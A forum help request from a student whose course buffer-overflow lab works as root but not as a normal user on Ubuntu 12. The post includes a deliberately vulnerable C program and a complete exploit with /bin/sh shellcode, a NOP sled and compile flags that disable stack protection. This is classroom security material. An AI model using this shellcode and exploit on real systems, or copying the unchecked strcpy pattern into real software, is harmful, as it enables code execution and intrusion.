Below is my code, both the vulnerable program (stack.c) and my exploit (exploit.c). This code works on a pre-packaged Ubuntu 9 that the prof sent out for windows users (I had a friend test it on his computer), but on Ubuntu 12 that I run on my iMac, i get segfaults when I try and do this in a normal user.
here's stack:
//stack.c
#include <stdio.h>
int bof(char *str)
{
char buffer[12];
//BO Vulnerability
strcpy(buffer,str);
return 1;
}
int main(int argc, char* argv[])
{
char str[517];
FILE *badfile;
badfile = fopen("badfile","r");
fread(str, sizeof(char),517, badfile);
bof(str);
printf("Returned Properly\n");
return 1;
}
and exploit:
//exploit.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#define DEFAULT_OFFSET 350
char code[]=
"\x31\xc0"
"\x50"
"\x68""//sh"
"\x68""/bin"
"\x89\xe3"
"\x50"
"\x53"
"\x89\xe1"
"\x99"
"\xb0\x0b"
"\xcd\x80"
;
unsigned long get_sp(void)
{
__asm__("movl %esp,%eax");
}
void main(int argc, char **argv)
{
char buffer[517];
FILE *badfile;
char *ptr;
long *a_ptr,ret;
int offset = DEFAULT_OFFSET;
int codeSize = sizeof(code);
int buffSize = sizeof(buffer);
if(argc > 1) offset = atoi(argv[1]); //allows for command line input
ptr=buffer;
a_ptr = (long *) ptr;
/* Initialize buffer with 0x90 (NOP instruction) */
memset(buffer, 0x90, buffSize);
//----------------------BEGIN FILL BUFFER----------------------\\
ret = get_sp()+offset;
printf("Return Address: 0x%x\n",get_sp());
printf("Address: 0x%x\n",ret);
ptr = buffer;
a_ptr = (long *) ptr;
int i;
for (i = 0; i < 300;i+=4)
*(a_ptr++) = ret;
for(i = 486;i < codeSize + 486;++i)
buffer[i] = code[i-486];
buffer[buffSize - 1] = '\0';
//-----------------------END FILL BUFFER-----------------------\\
/* Save the contents to the file "badfile" */
badfile = fopen("./badfile", "w");
fwrite(buffer,517,1,badfile);
fclose(badfile);
}
To compile these within Ubuntu 12 I used:
gcc -o stack -fno-stack-protector -g -z execstack stack.c
gcc -o exploit exploit.c
Again, it works in a root user, just not a regular user;
Anyways, this is due at midnight and I limped my way through the rest of the assignment with this restriction, but I'd much rather complete it properly if someone has a suggestion. Figured I'd call in the experts before throwing in the towel. I'm looking to see why, this code, will not work in a normal user (as it should, and does on older versions of ubuntu) but does work in a root user. what do i need to change to make this work in the normal user also.